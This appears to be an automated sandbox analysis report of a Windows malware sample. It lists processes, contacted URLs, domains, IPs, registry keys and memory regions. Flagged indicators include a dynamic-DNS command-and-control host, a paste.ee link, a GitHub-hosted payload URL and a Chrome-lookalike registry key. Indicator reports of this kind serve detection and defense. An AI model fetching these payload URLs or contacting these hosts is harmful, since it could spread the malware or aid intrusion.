"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2012,i,3848042767598446159,15832118433102009625,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2028,i,15924250175209133703,8349155567450697044,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1728 --field-trial-handle=1980,i,7225582587041739135,14714490613506234970,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2012,i,8574600569835257597,12503451850514221727,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1648 --field-trial-handle=1996,i,18342384901192943427,3001916881733487027,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=2008,i,13349874762832594225,9819071068630656309,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1984,i,11069439797262297707,896590743492590315,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
There are 76 hidden processes, click here to show them.

URLs

Name
IP
Malicious
ab9001.ddns.net
malicious
https://paste.ee/d/XlUYO/0
188.114.97.3
malicious
https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
unknown
https://go.microsoft.co
unknown
https://contoso.com/License
unknown
https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
unknown
https://www.linkedin.com/cws/share?url=$
unknown
https://analytics.paste.ee
unknown
https://g.live.com/odclientsettings/ProdV2.C:
unknown
https://paste.ee
unknown
https://github.com/Youssef1313
unknown
https://aka.ms/msignite_docs_banner
unknown
https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9
unknown
http://polymer.github.io/AUTHORS.txt
unknown
https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
unknown
https://www.google.com
unknown
https://management.azure.com/subscriptions?api-version=2016-06-01
unknown
https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
unknown
http://geoplugin.net/json.gp/C
unknown
https://aka.ms/pshelpmechoose
unknown
https://aka.ms/feedback/report?space=61
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://oneget.orgX
unknown
https://learn-video.azurefd.net/vod/player
unknown
https://cdnjs.cloudflare.com
unknown
https://twitter.com/intent/tweet?original_referer=$
unknown
https://github.com/gewarren
unknown
https://cdnjs.cloudflare.com;
unknown
http://polymer.github.io/CONTRIBUTORS.txt
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://secure.gravatar.com
unknown
https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
unknown
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
185.199.110.133
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
unknown
https://client-api.arkoselabs.com/v2/api.js
unknown
https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://paste.ee
unknown
https://github.com/Thraka
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
http://polymer.github.io/PATENTS.txt
unknown
https://aka.ms/certhelp
unknown
https://www.google.com;
unknown
https://contoso.com/Icon
unknown
https://raw.githubusercont
unknown
http://crl.ver)
unknown
https://github.com/mairaw
unknown
https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
13.107.246.44
https://schema.org
unknown
http://polymer.github.io/LICENSE.txt
unknown
https://github.com/Pester/Pester
unknown
https://aka.ms/yourcaliforniaprivacychoices
unknown
http://geoplugin.net/json.gp
unknown
https://github.com/nschonni
unknown
https://g.live.com/odclientsettings/Prod/C:
unknown
https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05
unknown
https://github.com/adegeo
unknown
https://raw.githubusercontent.com
unknown
https://github.com/jonschlinkert/is-plain-object
unknown
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtJhu;
unknown
https://octokit.github.io/rest.js/#throttling
unknown
http://raw.githubusercontent.com
unknown
https://aka.ms/aiskillschallenge/T1LearnBanner?wt.mc_id=aisc25_learnpromo1_website_cnl
unknown
https://analytics.paste.ee;
unknown
https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2017-0
unknown
https://github.com/js-cookie/js-cookie
unknown
https://aka.ms/pscore68
unknown
http://schema.org/Organization
unknown
https://channel9.msdn.com/
unknown
https://themes.googleusercontent.com
unknown
https://github.com/dotnet/try
unknown
https://oneget.org
unknown
There are 66 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
paste.ee
188.114.97.3
malicious
ab9001.ddns.net
64.188.16.157
malicious
js.monitor.azure.com
unknown
malicious
mdec.nelreports.net
unknown
malicious
s-part-0016.t-0009.t-msedge.net
13.107.246.44
raw.githubusercontent.com
185.199.110.133
s-part-0017.t-0009.fb-t-msedge.net
13.107.253.45
s-part-0017.t-0009.t-msedge.net
13.107.246.45
www.google.com
142.250.184.196
s-part-0032.t-0009.t-msedge.net
13.107.246.60

IPs

IP
Domain
Country
Malicious
192.168.2.5
unknown
unknown
malicious
64.188.16.157
ab9001.ddns.net
United States
malicious
188.114.97.3
paste.ee
European Union
malicious
127.0.0.1
unknown
unknown
malicious
13.107.246.45
s-part-0017.t-0009.t-msedge.net
United States
13.107.246.44
s-part-0016.t-0009.t-msedge.net
United States
13.107.246.60
s-part-0032.t-0009.t-msedge.net
United States
185.199.110.133
raw.githubusercontent.com
Netherlands
142.250.184.196
www.google.com
United States
13.107.253.45
s-part-0017.t-0009.fb-t-msedge.net
United States
239.255.255.250
unknown
Reserved
There are 1 hidden IPs, click here to show them.

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Chrorne-K04X5E
exepath
HKEY_CURRENT_USER\SOFTWARE\Chrorne-K04X5E
licence
HKEY_CURRENT_USER\SOFTWARE\Chrorne-K04X5E
WD
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
There are 8 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
400000
remote allocation
page execute and read and write
malicious
1568000
heap
page read and write
malicious
323F000
stack
page read and write
malicious
180E8AFF000
trusted library allocation
page read and write
malicious
180E9BA7000
trusted library allocation
page read and write
malicious
A4F597E000
stack
page read and write
7FF848EA0000
trusted library allocation
page read and write
7FF848E40000
trusted library allocation
page read and write
2D01000
heap
page read and write
1CABA585000
heap
page read and write
2A59000
stack
page read and write
2F70000
heap
page read and write
6940000
trusted library allocation
page read and write
22448B44000
heap
page read and write
1C4F5BB0000
trusted library section
page read and write
1C4FB450000
trusted library allocation
page read and write
180D6E05000
heap
page read and write
57BE000
stack
page read and write
7FF848D90000
trusted library allocation
page execute and read and write
6110000
heap
page read and write
3275000
heap
page read and write
3225000
heap
page read and write
778E000
stack
page read and write
3000000
heap
page read and write
194B891D000
heap
page read and write
B5834E000
stack
page read and write
22446C5E000
heap
page read and write
180D6E80000
trusted library allocation
page read and write
7FF848D71000
trusted library allocation
page read and write
32A9000
stack
page read and write
1C4FB4C0000
remote allocation
page read and write
31ED000
stack
page read and write
1CABA4E0000
heap
page readonly
7FF848E30000
trusted library allocation
page read and write
22448BA6000
heap
page read and write
49DB937000
stack
page read and write
777E000
stack
page read and write
17B0000
unclassified section
page execute and read and write
194BA727000
trusted library allocation
page read and write
703E000
stack
page read and write
4E2B000
stack
page read and write
4E6E000
stack
page read and write
3013000
heap
page read and write
194D282F000
heap
page read and write
7FF848C60000
trusted library allocation
page read and write
1CABA2BE000
heap
page read and write
2F01000
heap
page read and write
3006000
heap
page read and write
180D8E9D000
trusted library allocation
page read and write
180F1071000
heap
page read and write
7FF848E60000
trusted library allocation
page read and write
2E5F000
heap
page read and write
180DA398000
trusted library allocation
page read and write
52DE000
stack
page read and write
180F1260000
trusted library section
page read and write
723C000
stack
page read and write
2C02000
heap
page read and write
678C000
stack
page read and write
360E000
stack
page read and write
63FE000
stack
page read and write
2C87000
heap
page read and write
2E12000
heap
page read and write
3221000
heap
page read and write
7FF848ED0000
trusted library allocation
page read and write
2E25000
heap
page read and write
7FF848E60000
trusted library allocation
page read and write
4C2E000
stack
page read and write
194D282D000
heap
page read and write
194B8A30000
trusted library allocation
page read and write
2E2E000
heap
page read and write
34D0000
heap
page read and write
2F7E000
stack
page read and write
327F000
heap
page read and write
31F0000
heap
page read and write
1C4FB460000
trusted library allocation
page read and write
3E07000
unclassified section
page execute and read and write
6401000
heap
page read and write
6800000
trusted library allocation
page read and write
17F0000
unclassified section
page execute and read and write
1CABC2C6000
heap
page execute and read and write
2E80000
heap
page read and write
1CABA580000
heap
page read and write
3244000
heap
page read and write
7FF848EC0000
trusted library allocation
page read and write
3750000
heap
page read and write
25F0000
heap
page read and write
3C50000
unclassified section
page execute and read and write
1CAD4510000
heap
page read and write
788E000
stack
page read and write
22448EAB000
heap
page read and write
3A06000
heap
page read and write
2C00000
heap
page read and write
3301000
heap
page read and write
588E000
stack
page read and write
39CE000
stack
page read and write
2BF0000
heap
page read and write
1CACC45E000
trusted library allocation
page read and write
17D0000
unclassified section
page execute and read and write
7FF848E40000
trusted library allocation
page read and write
49DB7FE000
stack
page read and write
7FF848BD0000
trusted library allocation
page read and write
22448F1A000
heap
page read and write
3080000
heap
page read and write
22448C8D000
heap
page read and write
22448B81000
heap
page read and write
180D6CF0000
heap
page read and write
63FF000
stack
page read and write
3DE7000
unclassified section
page execute and read and write
180D6D50000
trusted library allocation
page read and write
4E5B000
stack
page read and write
4B1E000
stack
page read and write
7DF4993C0000
trusted library allocation
page execute and read and write
1CABC2D0000
heap
page execute and read and write
75FB000
stack
page read and write
7FF848E90000
trusted library allocation
page read and write
180DA20D000
trusted library allocation
page read and write
22448BAA000
heap
page read and write
22448CA5000
heap
page read and write
532D000
stack
page read and write
7FF848C60000
trusted library allocation
page read and write
194B8AC5000
heap
page read and write
69FE000
stack
page read and write
180D8E84000
trusted library allocation
page read and write
1C4FB2F3000
heap
page read and write
32FF000
stack
page read and write
6FFF000
stack
page read and write
1C4F6D40000
trusted library section
page readonly
6250000
heap
page read and write
22448B3A000
heap
page read and write
1C4FB263000
heap
page read and write
22448EDC000
heap
page read and write
22448B39000
heap
page read and write
6DBE000
stack
page read and write
7FF848EE0000
trusted library allocation
page read and write
140E000
stack
page read and write
1C4F6500000
heap
page read and write
2FC0000
heap
page read and write
A4F62FE000
stack
page read and write
370E000
stack
page read and write
49DB9BE000
stack
page read and write
194BA7FC000
trusted library allocation
page read and write
7FF848F33000
trusted library allocation
page read and write
7A6E000
stack
page read and write
2A90000
heap
page read and write
22448FEA000
heap
page read and write
194D2886000
heap
page read and write
3621000
heap
page read and write
7FF848F4C000
trusted library allocation
page read and write
7FF848EA0000
trusted library allocation
page read and write
333E000
stack
page read and write
75CF000
stack
page read and write
1CABC8B7000
trusted library allocation
page read and write
1C4FB256000
heap
page read and write
713C000
stack
page read and write
6A01000
heap
page read and write
1CABC3F1000
trusted library allocation
page read and write
4EDC000
stack
page read and write
1C4FB160000
trusted library allocation
page read and write
1CABC402000
trusted library allocation
page read and write
4E9E000
stack
page read and write
2E80000
heap
page read and write
A4F4A7B000
stack
page read and write
29D0000
heap
page read and write
4C2B000
stack
page read and write
2E86000
heap
page read and write
9C192FF000
stack
page read and write
506B000
stack
page read and write
1CABA560000
trusted library allocation
page read and write
737C000
stack
page read and write
7FF848BB3000
trusted library allocation
page execute and read and write
2FB0000
heap
page read and write
7FF848DF0000
trusted library allocation
page read and write
22448B91000
heap
page read and write
2E5F000
heap
page read and write
224486F0000
heap
page read and write
7FF848CD0000
trusted library allocation
page execute and read and write
135B000
stack
page read and write
A4F54FE000
unkown
page readonly
22448ECD000
heap
page read and write
22448B50000
heap
page read and write
2890000
heap
page read and write
3701000
heap
page read and write
545E000
stack
page read and write
A4F5D7E000
stack
page read and write
17F7000
unclassified section
page execute and read and write
22448C5D000
heap
page read and write
723E000
stack
page read and write
1CAD45F0000
heap
page read and write
180DA1DC000
trusted library allocation
page read and write
1C4F5C2B000
heap
page read and write
7FF848E60000
trusted library allocation
page read and write
2C61000
heap
page read and write
22448F0F000
heap
page read and write
727E000
stack
page read and write
7FF848BC3000
trusted library allocation
page execute and read and write
194BAA98000
trusted library allocation
page read and write
3020000
heap
page read and write
3012000
heap
page read and write
A4F59FE000
unkown
page readonly
2E21000
heap
page read and write
17D7000
unclassified section
page execute and read and write
194BAB64000
trusted library allocation
page read and write
B575F7000
stack
page read and write
6401000
heap
page read and write
549E000
stack
page read and write
175F000
stack
page read and write
4C1C000
stack
page read and write
2F01000
heap
page read and write
22448ED4000
heap
page read and write
22448B36000
heap
page read and write
2C7E000
heap
page read and write
22448B33000
heap
page read and write
22448B76000
heap
page read and write
333F000
stack
page read and write
29C2000
system
page execute and read and write
180DA205000
trusted library allocation
page read and write
2E27000
heap
page read and write
4DDD000
stack
page read and write
2E39000
stack
page read and write
1510000
unclassified section
page execute and read and write
30FD000
stack
page read and write
7FF848C6C000
trusted library allocation
page execute and read and write
535D000
stack
page read and write
2E2E000
heap
page read and write
1CABA305000
heap
page read and write
3212000
heap
page read and write
535E000
stack
page read and write
7FF848CD0000
trusted library allocation
page execute and read and write
1CABC530000
trusted library allocation
page read and write
B57579000
stack
page read and write
180D6F74000
heap
page read and write
2A40000
heap
page read and write
379E000
stack
page read and write
1817000
unclassified section
page execute and read and write
22448C6D000
heap
page read and write
733F000
stack
page read and write
22446D08000
heap
page read and write
2AC0000
system
page execute and read and write
22446D08000
heap
page read and write
303F000
heap
page read and write
322E000
heap
page read and write
1CABA4D0000
trusted library allocation
page read and write
22448C9D000
heap
page read and write
3021000
heap
page read and write
7FF848E20000
trusted library allocation
page read and write
7FF848F10000
trusted library allocation
page read and write
2AC2000
system
page execute and read and write
2CE9000
stack
page read and write
A4F66FE000
unkown
page readonly
2E12000
heap
page read and write
3200000
heap
page read and write
7FF848EB0000
trusted library allocation
page read and write
1CABA2C3000
heap
page read and write
1CABC474000
trusted library allocation
page read and write
25A9000
stack
page read and write
704B000
stack
page read and write
27E9000
stack
page read and write
3612000
heap
page read and write
35330FF000
stack
page read and write
314E000
stack
page read and write
2C43000
heap
page read and write
2D02000
system
page execute and read and write
2FCE000
stack
page read and write
22448ED3000
heap
page read and write
357D000
stack
page read and write
318E000
stack
page read and write
22448BAA000
heap
page read and write
548F000
stack
page read and write
13C0000
heap
page read and write
22448E30000
heap
page read and write
307B000
stack
page read and write
3C10000
unclassified section
page execute and read and write
4F5E000
stack
page read and write
22448F31000
heap
page read and write
B577FC000
stack
page read and write
22446D0C000
heap
page read and write
2EB0000
heap
page read and write
1C4F6513000
heap
page read and write
4FEE000
stack
page read and write
2BF0000
heap
page read and write
22448C30000
heap
page read and write
7FF848D52000
trusted library allocation
page read and write
7FF848E90000
trusted library allocation
page read and write
1C4F5C91000
heap
page read and write
194BA7E5000
trusted library allocation
page read and write
7FF848E00000
trusted library allocation
page read and write
9C18EFF000
stack
page read and write
22448BAA000
heap
page read and write
22446C56000
heap
page read and write
29D0000
heap
page read and write
74FE000
stack
page read and write
2A99000
stack
page read and write
1C4F5C96000
heap
page read and write
1C4FB21D000
heap
page read and write
3350000
heap
page read and write
3227000
heap
page read and write
A4F6EFE000
unkown
page readonly
525E000
stack
page read and write
22446CFC000
heap
page read and write
4FDE000
stack
page read and write
2C27000
heap
page read and write
2E00000
heap
page read and write
1C4FB190000
trusted library allocation
page read and write
1CABC53E000
trusted library allocation
page read and write
538E000
stack
page read and write
179E000
stack
page read and write
22448FEB000
heap
page read and write
3000000
heap
page read and write
53DE000
stack
page read and write
194BA834000
trusted library allocation
page read and write
180F0C30000
heap
page execute and read and write
3806000
heap
page read and write
733E000
stack
page read and write
2AC0000
heap
page read and write
29F0000
heap
page read and write
9C190FE000
stack
page read and write
31E0000
heap
page read and write
7FF848F20000
trusted library allocation
page read and write
7FF848D80000
trusted library allocation
page execute and read and write
194B8A70000
trusted library allocation
page read and write
49DB9B8000
stack
page read and write
180DA3F3000
trusted library allocation
page read and write
2E12000
heap
page read and write
180D8FDC000
trusted library allocation
page read and write
511D000
stack
page read and write
3B01000
heap
page read and write
1C4FB140000
trusted library allocation
page read and write
22446C56000
heap
page read and write
1CABA2CD000
heap
page read and write
4CDE000
stack
page read and write
A4F64FE000
unkown
page readonly
2E82000
system
page execute and read and write
1CAD446B000
heap
page read and write
2E21000
heap
page read and write
1CABC921000
trusted library allocation
page read and write
22448B81000
heap
page read and write
22446CFC000
heap
page read and write
2A40000
heap
page read and write
512B000
stack
page read and write
194B8916000
heap
page read and write
22448ED2000
heap
page read and write
3C17000
unclassified section
page execute and read and write
A4F5DFE000
unkown
page readonly
194B88CE000
heap
page read and write
22448C41000
heap
page read and write
4D6D000
stack
page read and write
3212000
heap
page read and write
1CABC7CE000
trusted library allocation
page read and write
160D000
heap
page read and write
194B898A000
heap
page read and write
2A60000
heap
page read and write
194BAC94000
trusted library allocation
page read and write
2C43000
heap
page read and write
22448E19000
heap
page read and write
2A60000
system
page execute and read and write
2A02000
heap
page read and write
323F000
heap
page read and write
2E02000
heap
page read and write
194BA7EC000
trusted library allocation
page read and write
1CABC2C0000
heap
page execute and read and write
1CABBEB0000
heap
page read and write
180DA36D000
trusted library allocation
page read and write
2CA9000
stack
page read and write
194BA7E8000
trusted library allocation
page read and write
1C4FB193000
trusted library allocation
page read and write
1C4FB2C7000
heap
page read and write
2F3D000
stack
page read and write
7FF848DB0000
trusted library allocation
page read and write
2C40000
heap
page read and write
353F000
stack
page read and write
1C4FB22A000
heap
page read and write
7FF848E80000
trusted library allocation
page read and write
7FF848E50000
trusted library allocation
page read and write
3C30000
unclassified section
page execute and read and write
73FE000
stack
page read and write
2C02000
heap
page read and write
7FF848D70000
trusted library allocation
page execute and read and write
49DB8BF000
stack
page read and write
7FF848BBD000
trusted library allocation
page execute and read and write
2FFE000
stack
page read and write
314E000
stack
page read and write
1C4FB2C0000
heap
page read and write
7FF848E10000
trusted library allocation
page read and write
3212000
heap
page read and write
27B9000
stack
page read and write
194D29E7000
heap
page execute and read and write
3600000
heap
page read and write
3000000
heap
page read and write
322E000
heap
page read and write
49DE000
stack
page read and write
22448B3A000
heap
page read and write
1CABA240000
heap
page read and write
7FF848DC0000
trusted library allocation
page read and write
1C4F5C74000
heap
page read and write
357E000
stack
page read and write
2E21000
heap
page read and write
194BA775000
trusted library allocation
page read and write
194B8A80000
heap
page read and write
792C000
stack
page read and write
1CABBEB6000
heap
page read and write
2A02000
heap
page read and write
2C00000
heap
page read and write
B573FF000
stack
page read and write
3301000
heap
page read and write
3532CFE000
stack
page read and write
1C4FB124000
trusted library allocation
page read and write
7FF848BD0000
trusted library allocation
page read and write
194B88D2000
heap
page read and write
322E000
heap
page read and write
2DDE000
stack
page read and write
7FF848D61000
trusted library allocation
page read and write
B576FE000
stack
page read and write
194D288B000
heap
page read and write
6401000
heap
page read and write
475000
remote allocation
page execute and read and write
194B8A60000
heap
page readonly
29C0000
heap
page read and write
7FF848BC0000
trusted library allocation
page read and write
1C4F63F0000
trusted library allocation
page read and write
2E30000
system
page execute and read and write
194CA74F000
trusted library allocation
page read and write
339E000
stack
page read and write
3532E7E000
stack
page read and write
1C4FB1F0000
trusted library allocation
page read and write
367E000
stack
page read and write
180F0BF0000
heap
page execute and read and write
7FF848DA2000
trusted library allocation
page read and write
7FF848F31000
trusted library allocation
page read and write
6F3E000
stack
page read and write
22448F0C000
heap
page read and write
728F000
stack
page read and write
50DD000
stack
page read and write
180D6F76000
heap
page read and write
2BC0000
heap
page read and write
49DB6FF000
stack
page read and write
2E27000
heap
page read and write
6EFB000
stack
page read and write
2C28000
heap
page read and write
A4F5B7E000
stack
page read and write
3002000
heap
page read and write
22446D0B000
heap
page read and write
4DCE000
stack
page read and write
A4F67FA000
stack
page read and write
2FE0000
heap
page read and write
B56F33000
stack
page read and write
2E10000
heap
page read and write
1C4FB302000
heap
page read and write
180E8D88000
trusted library allocation
page read and write
3012000
heap
page read and write
22448C75000
heap
page read and write
22448F1A000
heap
page read and write
1C4F5C00000
heap
page read and write
3501000
heap
page read and write
773B000
stack
page read and write
3E00000
unclassified section
page execute and read and write
3532BFE000
stack
page read and write
49DBCBC000
stack
page read and write
27E0000
heap
page read and write
4D2E000
stack
page read and write
748C000
stack
page read and write
2C44000
heap
page read and write
3012000
heap
page read and write
1C4FB280000
trusted library allocation
page read and write
38FF000
stack
page read and write
22448B31000
heap
page read and write
2E3F000
heap
page read and write
2E43000
heap
page read and write
22448C35000
heap
page read and write
180D6BB0000
heap
page read and write
22448E31000
heap
page read and write
22446CFC000
heap
page read and write
2C2E000
heap
page read and write
180D6E0A000
heap
page read and write
3606000
heap
page read and write
3150000
heap
page read and write
180D6DBF000
heap
page read and write
180D8CB2000
trusted library allocation
page read and write
2C75000
heap
page read and write
7FF848BB3000
trusted library allocation
page execute and read and write
27B0000
system
page execute and read and write
22448EC4000
heap
page read and write
3701000
heap
page read and write
1C4F5CA5000
heap
page read and write
2E25000
heap
page read and write
2BEE000
stack
page read and write
3B04000
heap
page read and write
3212000
heap
page read and write
1CABC4E1000
trusted library allocation
page read and write
545D000
stack
page read and write
1C4FB31E000
heap
page read and write
9C18FFD000
stack
page read and write
3101000
heap
page read and write
2D01000
heap
page read and write
1C4FB121000
trusted library allocation
page read and write
6E00000
trusted library allocation
page read and write
3027000
heap
page read and write
2AF0000
heap
page read and write
B5727F000
stack
page read and write
22448B5F000
heap
page read and write
22448C88000
heap
page read and write
3200000
heap
page read and write
7FF848E80000
trusted library allocation
page read and write
2E27000
heap
page read and write
4DAE000
stack
page read and write
1C4F5C3F000
heap
page read and write
2E2E000
heap
page read and write
1C4F5BA0000
trusted library allocation
page read and write
22448B5F000
heap
page read and write
2BF9000
stack
page read and write
2C2E000
heap
page read and write
539E000
stack
page read and write
6D40000
trusted library allocation
page read and write
353E000
stack
page read and write
1C4FC000000
heap
page read and write
2739000
stack
page read and write
A4F637E000
stack
page read and write
194D27F5000
heap
page read and write
3040000
heap
page read and write
355E000
stack
page read and write
2CC9000
stack
page read and write
7FF848E80000
trusted library allocation
page read and write
33A0000
heap
page read and write
1530000
unclassified section
page execute and read and write
3632000
heap
page read and write
7FF848CE0000
trusted library allocation
page execute and read and write
194B87B0000
heap
page read and write
2C87000
heap
page read and write
2C12000
heap
page read and write
22448B9A000
heap
page read and write
2D50000
heap
page read and write
3160000
heap
page read and write
49DB57E000
stack
page read and write
3530000
heap
page read and write
7FF848DD0000
trusted library allocation
page read and write
1C4FB313000
heap
page read and write
1C4FB2FB000
heap
page read and write
1C4FB4C0000
remote allocation
page read and write
2949000
stack
page read and write
194CA6F0000
trusted library allocation
page read and write
3120000
heap
page read and write
22448F1A000
heap
page read and write
22448B46000
heap
page read and write
22448D24000
heap
page read and write
4C6B000
stack
page read and write
7FF848C96000
trusted library allocation
page execute and read and write
1C4F6D30000
trusted library section
page readonly
27C0000
heap
page read and write
69C0000
trusted library allocation
page read and write
783C000
stack
page read and write
327D000
heap
page read and write
2B6E000
stack
page read and write
7FF848C80000
trusted library allocation
page execute and read and write
555D000
stack
page read and write
22448B56000
heap
page read and write
2879000
stack
page read and write
2720000
system
page execute and read and write
7FF848C70000
trusted library allocation
page read and write
9C193FB000
stack
page read and write
180F107B000
heap
page read and write
7FF848EC0000
trusted library allocation
page read and write
3200000
heap
page read and write
B56FFE000
stack
page read and write
3250000
heap
page read and write
2E2E000
heap
page read and write
9C18DFF000
stack
page read and write
3226000
heap
page read and write
27DD000
stack
page read and write
180F1090000
heap
page read and write
3200000
heap
page read and write
7FF848DB0000
trusted library allocation
page execute and read and write
3289000
heap
page read and write
7D3E000
stack
page read and write
4F6F000
stack
page read and write
22448C7D000
heap
page read and write
7FF848E10000
trusted library allocation
